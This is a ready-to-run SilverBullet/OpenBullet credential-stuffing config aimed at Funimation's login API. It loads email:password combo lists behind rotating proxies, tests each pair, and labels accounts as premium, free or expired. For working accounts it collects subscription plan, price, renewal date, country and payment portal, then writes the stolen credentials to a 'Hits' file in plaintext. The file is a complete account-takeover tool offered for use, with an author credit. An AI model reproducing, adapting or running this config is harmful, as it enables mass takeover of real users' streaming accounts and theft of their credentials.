[SETTINGS]
{
  "Name": "Funimation {Web Api}",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-10-07T21:16:26.9415315+05:30",
  "AdditionalInfo": "Config made by @JustDaixD",
  "RequiredPlugins": [],
  "Author": "Just Dai xD",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Mail Pass",
  "AllowedWordlist2": "Mail Pass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Funimation {Web Api}",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#Login REQUEST POST "https://prod-api-funimationnow.dadcdigital.com/api/auth/login/" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"success\":false,\"error\":\"" 
  KEYCHAIN Success OR 
    KEY "premium" 
  KEYCHAIN Custom "FREE" OR 
    KEY "free" 

#AuthToken PARSE "<SOURCE>" JSON "token" -> VAR "AuthToken" 

#Subscription REQUEST GET "https://prod-api-funimationnow.dadcdigital.com/api/source/stripe/subscription/" 
  
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9,ne;q=0.8,tr;q=0.7" 
  HEADER "authorization: Token <AuthToken>" 
  HEADER "origin: https://www.funimation.com" 
  HEADER "referer: https://www.funimation.com/" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Mobile Safari/537.36" 

#Subscription PARSE "<SOURCE>" JSON "plan" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Subscription" 

#Price PARSE "<SOURCE>" JSON "subscriptionPrice" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Price" 

#Subscription_Period PARSE "<SOURCE>" JSON "subscriptionFrequency" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Subscription Period" "" "ly" 

#Active PARSE "<SOURCE>" JSON "active" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Active" 

#Expiry_Date PARSE "<SOURCE>" JSON "renewDate" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Expiry Date" 

#renewDat PARSE "<SOURCE>" JSON "renewDateZ" JTokenParsing=TRUE -> VAR "renewDat" 

#Days_Left FUNCTION GetRemainingDay "<renewDat>" -> CAP "Days Left" 

#Days_Left FUNCTION Compute "<Days Left>+1" -> VAR "Days Left" 

#Trial_Period PARSE "<SOURCE>" JSON "isTrialPeriod" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Trial Period" 

#Region PARSE "<SOURCE>" JSON "subscriptionRegion" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Region" 

#Country FUNCTION Translate 
  KEY "AF" VALUE "Afghanistan" 
  KEY "AX" VALUE "&Aring;land Islands" 
  KEY "AL" VALUE "Albania" 
  KEY "DZ" VALUE "Algeria" 
  KEY "AS" VALUE "American Samoa" 
  KEY "AD" VALUE "Andorra" 
  KEY "AO" VALUE "Angola" 
  KEY "AI" VALUE "Anguilla" 
  KEY "AQ" VALUE "Antarctica" 
  KEY "AG" VALUE "Antigua and Barbuda" 
  KEY "AR" VALUE "Argentina" 
  KEY "AM" VALUE "Armenia" 
  KEY "AW" VALUE "Aruba" 
  KEY "AU" VALUE "Australia" 
  KEY "AT" VALUE "Austria" 
  KEY "AZ" VALUE "Azerbaijan" 
  KEY "BS" VALUE "Bahamas" 
  KEY "BH" VALUE "Bahrain" 
  KEY "BD" VALUE "Bangladesh" 
  KEY "BB" VALUE "Barbados" 
  KEY "BY" VALUE "Belarus" 
  KEY "BE" VALUE "Belgium" 
  KEY "BZ" VALUE "Belize" 
  KEY "BJ" VALUE "Benin" 
  KEY "BM" VALUE "Bermuda" 
  KEY "BT" VALUE "Bhutan" 
  KEY "BO" VALUE "Bolivia (Plurinational State of)" 
  KEY "BQ" VALUE "Bonaire, Sint Eustatius and Saba" 
  KEY "BA" VALUE "Bosnia and Herzegovina" 
  KEY "BW" VALUE "Botswana" 
  KEY "BV" VALUE "Bouvet Island" 
  KEY "BR" VALUE "Brazil" 
  KEY "IO" VALUE "British Indian Ocean Territory" 
  KEY "BN" VALUE "Brunei Darussalam" 
  KEY "BG" VALUE "Bulgaria" 
  KEY "BF" VALUE "Burkina Faso" 
  KEY "BI" VALUE "Burundi" 
  KEY "CV" VALUE "Cabo Verde" 
  KEY "KH" VALUE "Cambodia" 
  KEY "CM" VALUE "Cameroon" 
  KEY "CA" VALUE "Canada" 
  KEY "KY" VALUE "Cayman Islands" 
  KEY "CF" VALUE "Central African Republic" 
  KEY "TD" VALUE "Chad" 
  KEY "CL" VALUE "Chile" 
  KEY "CN" VALUE "China" 
  KEY "CX" VALUE "Christmas Island" 
  KEY "CC" VALUE "Cocos (Keeling) Islands" 
  KEY "CO" VALUE "Colombia" 
  KEY "KM" VALUE "Comoros" 
  KEY "CD" VALUE "Congo (the Democratic Republic of the)" 
  KEY "CG" VALUE "Congo" 
  KEY "CK" VALUE "Cook Islands" 
  KEY "CR" VALUE "Costa Rica" 
  KEY "CI" VALUE "C&ocirc;te d'Ivoire" 
  KEY "HR" VALUE "Croatia" 
  KEY "CU" VALUE "Cuba" 
  KEY "CW" VALUE "Cura&ccedil;ao" 
  KEY "CY" VALUE "Cyprus" 
  KEY "CZ" VALUE "Czechia" 
  KEY "DK" VALUE "Denmark" 
  KEY "DJ" VALUE "Djibouti" 
  KEY "DM" VALUE "Dominica" 
  KEY "DO" VALUE "Dominican Republic" 
  KEY "EC" VALUE "Ecuador" 
  KEY "EG" VALUE "Egypt" 
  KEY "SV" VALUE "El Salvador" 
  KEY "GQ" VALUE "Equatorial Guinea" 
  KEY "ER" VALUE "Eritrea" 
  KEY "EE" VALUE "Estonia" 
  KEY "SZ" VALUE "Eswatini" 
  KEY "ET" VALUE "Ethiopia" 
  KEY "FK" VALUE "Falkland Islands [Malvinas]" 
  KEY "FO" VALUE "Faroe Islands" 
  KEY "FJ" VALUE "Fiji" 
  KEY "FI" VALUE "Finland" 
  KEY "FR" VALUE "France" 
  KEY "GF" VALUE "French Guiana" 
  KEY "PF" VALUE "French Polynesia" 
  KEY "TF" VALUE "French Southern Territories" 
  KEY "GA" VALUE "Gabon" 
  KEY "GM" VALUE "Gambia" 
  KEY "GE" VALUE "Georgia" 
  KEY "DE" VALUE "Germany" 
  KEY "GH" VALUE "Ghana" 
  KEY "GI" VALUE "Gibraltar" 
  KEY "GR" VALUE "Greece" 
  KEY "GL" VALUE "Greenland" 
  KEY "GD" VALUE "Grenada" 
  KEY "GP" VALUE "Guadeloupe" 
  KEY "GU" VALUE "Guam" 
  KEY "GT" VALUE "Guatemala" 
  KEY "GG" VALUE "Guernsey" 
  KEY "GN" VALUE "Guinea" 
  KEY "GW" VALUE "Guinea-Bissau" 
  KEY "GY" VALUE "Guyana" 
  KEY "HT" VALUE "Haiti" 
  KEY "HM" VALUE "Heard Island and McDonald Islands" 
  KEY "VA" VALUE "Holy See" 
  KEY "HN" VALUE "Honduras" 
  KEY "HK" VALUE "Hong Kong" 
  KEY "HU" VALUE "Hungary" 
  KEY "IS" VALUE "Iceland" 
  KEY "IN" VALUE "India" 
  KEY "ID" VALUE "Indonesia" 
  KEY "IR" VALUE "Iran (Islamic Republic of)" 
  KEY "IQ" VALUE "Iraq" 
  KEY "IE" VALUE "Ireland" 
  KEY "IM" VALUE "Isle of Man" 
  KEY "IL" VALUE "Israel" 
  KEY "IT" VALUE "Italy" 
  KEY "JM" VALUE "Jamaica" 
  KEY "JP" VALUE "Japan" 
  KEY "JE" VALUE "Jersey" 
  KEY "JO" VALUE "Jordan" 
  KEY "KZ" VALUE "Kazakhstan" 
  KEY "KE" VALUE "Kenya" 
  KEY "KI" VALUE "Kiribati" 
  KEY "KP" VALUE "Korea (the Democratic People's Republic of)" 
  KEY "KR" VALUE "Korea (the Republic of)" 
  KEY "KW" VALUE "Kuwait" 
  KEY "KG" VALUE "Kyrgyzstan" 
  KEY "LA" VALUE "Lao People's Democratic Republic" 
  KEY "LV" VALUE "Latvia" 
  KEY "LB" VALUE "Lebanon" 
  KEY "LS" VALUE "Lesotho" 
  KEY "LR" VALUE "Liberia" 
  KEY "LY" VALUE "Libya" 
  KEY "LI" VALUE "Liechtenstein" 
  KEY "LT" VALUE "Lithuania" 
  KEY "LU" VALUE "Luxembourg" 
  KEY "MO" VALUE "Macao" 
  KEY "MK" VALUE "Republic of North Macedonia" 
  KEY "MG" VALUE "Madagascar" 
  KEY "MW" VALUE "Malawi" 
  KEY "MY" VALUE "Malaysia" 
  KEY "MV" VALUE "Maldives" 
  KEY "ML" VALUE "Mali" 
  KEY "MT" VALUE "Malta" 
  KEY "MH" VALUE "Marshall Islands" 
  KEY "MQ" VALUE "Martinique" 
  KEY "MR" VALUE "Mauritania" 
  KEY "MU" VALUE "Mauritius" 
  KEY "YT" VALUE "Mayotte" 
  KEY "MX" VALUE "Mexico" 
  KEY "FM" VALUE "Micronesia (Federated States of)" 
  KEY "MD" VALUE "Moldova (the Republic of)" 
  KEY "MC" VALUE "Monaco" 
  KEY "MN" VALUE "Mongolia" 
  KEY "ME" VALUE "Montenegro" 
  KEY "MS" VALUE "Montserrat" 
  KEY "MA" VALUE "Morocco" 
  KEY "MZ" VALUE "Mozambique" 
  KEY "MM" VALUE "Myanmar" 
  KEY "NA" VALUE "Namibia" 
  KEY "NR" VALUE "Nauru" 
  KEY "NP" VALUE "Nepal" 
  KEY "NL" VALUE "Netherlands" 
  KEY "NC" VALUE "New Caledonia" 
  KEY "NZ" VALUE "New Zealand" 
  KEY "NI" VALUE "Nicaragua" 
  KEY "NE" VALUE "Niger" 
  KEY "NG" VALUE "Nigeria" 
  KEY "NU" VALUE "Niue" 
  KEY "NF" VALUE "Norfolk Island" 
  KEY "MP" VALUE "Northern Mariana Islands" 
  KEY "NO" VALUE "Norway" 
  KEY "OM" VALUE "Oman" 
  KEY "PK" VALUE "Pakistan" 
  KEY "PW" VALUE "Palau" 
  KEY "PS" VALUE "Palestine, State of" 
  KEY "PA" VALUE "Panama" 
  KEY "PG" VALUE "Papua New Guinea" 
  KEY "PY" VALUE "Paraguay" 
  KEY "PE" VALUE "Peru" 
  KEY "PH" VALUE "Philippines" 
  KEY "PN" VALUE "Pitcairn" 
  KEY "PL" VALUE "Poland" 
  KEY "PT" VALUE "Portugal" 
  KEY "PR" VALUE "Puerto Rico" 
  KEY "QA" VALUE "Qatar" 
  KEY "RE" VALUE "R&eacute;union" 
  KEY "RO" VALUE "Romania" 
  KEY "RU" VALUE "Russian Federation" 
  KEY "RW" VALUE "Rwanda" 
  KEY "BL" VALUE "Saint Barth&eacute;lemy" 
  KEY "SH" VALUE "Saint Helena, Ascension and Tristan da Cunha" 
  KEY "KN" VALUE "Saint Kitts and Nevis" 
  KEY "LC" VALUE "Saint Lucia" 
  KEY "MF" VALUE "Saint Martin (French part)" 
  KEY "PM" VALUE "Saint Pierre and Miquelon" 
  KEY "VC" VALUE "Saint Vincent and the Grenadines" 
  KEY "WS" VALUE "Samoa" 
  KEY "SM" VALUE "San Marino" 
  KEY "ST" VALUE "Sao Tome and Principe" 
  KEY "SA" VALUE "Saudi Arabia" 
  KEY "SN" VALUE "Senegal" 
  KEY "RS" VALUE "Serbia" 
  KEY "SC" VALUE "Seychelles" 
  KEY "SL" VALUE "Sierra Leone" 
  KEY "SG" VALUE "Singapore" 
  KEY "SX" VALUE "Sint Maarten (Dutch part)" 
  KEY "SK" VALUE "Slovakia" 
  KEY "SI" VALUE "Slovenia" 
  KEY "SB" VALUE "Solomon Islands" 
  KEY "SO" VALUE "Somalia" 
  KEY "ZA" VALUE "South Africa" 
  KEY "GS" VALUE "South Georgia and the South Sandwich Islands" 
  KEY "SS" VALUE "South Sudan" 
  KEY "ES" VALUE "Spain" 
  KEY "LK" VALUE "Sri Lanka" 
  KEY "SD" VALUE "Sudan" 
  KEY "SR" VALUE "Suriname" 
  KEY "SJ" VALUE "Svalbard and Jan Mayen" 
  KEY "SE" VALUE "Sweden" 
  KEY "CH" VALUE "Switzerland" 
  KEY "SY" VALUE "Syrian Arab Republic" 
  KEY "TW" VALUE "Taiwan (Province of China)" 
  KEY "TJ" VALUE "Tajikistan" 
  KEY "TZ" VALUE "Tanzania, United Republic of" 
  KEY "TH" VALUE "Thailand" 
  KEY "TL" VALUE "Timor-Leste" 
  KEY "TG" VALUE "Togo" 
  KEY "TK" VALUE "Tokelau" 
  KEY "TO" VALUE "Tonga" 
  KEY "TT" VALUE "Trinidad and Tobago" 
  KEY "TN" VALUE "Tunisia" 
  KEY "TR" VALUE "Turkey" 
  KEY "TM" VALUE "Turkmenistan" 
  KEY "TC" VALUE "Turks and Caicos Islands" 
  KEY "TV" VALUE "Tuvalu" 
  KEY "UG" VALUE "Uganda" 
  KEY "UA" VALUE "Ukraine" 
  KEY "AE" VALUE "United Arab Emirates" 
  KEY "GB" VALUE "United Kingdom of Great Britain and Northern Ireland" 
  KEY "UM" VALUE "United States Minor Outlying Islands" 
  KEY "US" VALUE "United States of America" 
  KEY "UY" VALUE "Uruguay" 
  KEY "UZ" VALUE "Uzbekistan" 
  KEY "VU" VALUE "Vanuatu" 
  KEY "VE" VALUE "Venezuela (Bolivarian Republic of)" 
  KEY "VN" VALUE "Viet Nam" 
  KEY "VG" VALUE "Virgin Islands (British)" 
  KEY "VI" VALUE "Virgin Islands (U.S.)" 
  KEY "WF" VALUE "Wallis and Futuna" 
  KEY "EH" VALUE "Western Sahara" 
  KEY "YE" VALUE "Yemen" 
  KEY "ZM" VALUE "Zambia" 
  KEY "ZW" VALUE "Zimbabwe" 
  "<Region>" -> CAP "Country" 

#Payment_Portal PARSE "<SOURCE>" JSON "paymentPortal" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Payment Portal" 

#Device_Streaming_Limit PARSE "<SOURCE>" JSON "streamLimit" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "Device Streaming Limit" 

PARSE "<SOURCE>" LR "{\"regions\":[\"" "\"]" Recursive=TRUE -> VAR "product features regions" 

PARSE "<SOURCE>" JSON "subscriptionProduct.features[*].title" JTokenParsing=TRUE Recursive=TRUE -> VAR "Product features list" 

FUNCTION Replace "\",\"" " ; " "<product features regions[*]>" -> VAR "product features regions" 

#Subscription_Features FUNCTION Constant "Feature = <Product features list[*]> - Region = <product features regions[*]>" -> CAP "Subscription Features" 

#KeyCheck KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<Active>" Contains "False" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<Subscription>" Contains "Free" 

FUNCTION Constant "@JustDaixD" -> CAP "Config made by" 

#save1 UTILITY File "Hits\\Funimation Premium\\Funimation Premium.txt" AppendLines "[+]-------- START -------[+]\\nAccount  = <USER>:<PASS>\\nEmail    = <USER>\\nPassword = <PASS>\\nProxy    = <PROXY>\\n-----------------------------\\n[+] Subscription = <Subscription>\\n[+] Price = <Price>\\n[+] Subscription Period = <Subscription Period>\\n[+] Active = <Active>\\n[+] Expiry Date = <Expiry Date>\\n[+] Days Left = <Days Left>\\n[+] Trial Period = <Trial Period>\\n[+] Region = <Region>\\n[+] Country = <Country>\\n[+] Payment Portal = <Payment Portal>\\n[+]--- Subscription Features ---[+]\\n" -> VAR "save1" 

#save1 UTILITY File "Hits\\Funimation Premium\\Funimation Premium.txt" AppendLines "Feature = <Product features list[*]>\\nRegion = <product features regions[*]>\\n" -> VAR "save2" 

#save3 UTILITY File "Hits\\Funimation Premium\\Funimation Premium.txt" AppendLines "[+]-------- END --------[+]\\n----Config made by = @JustDaixD----" -> VAR "save3" 

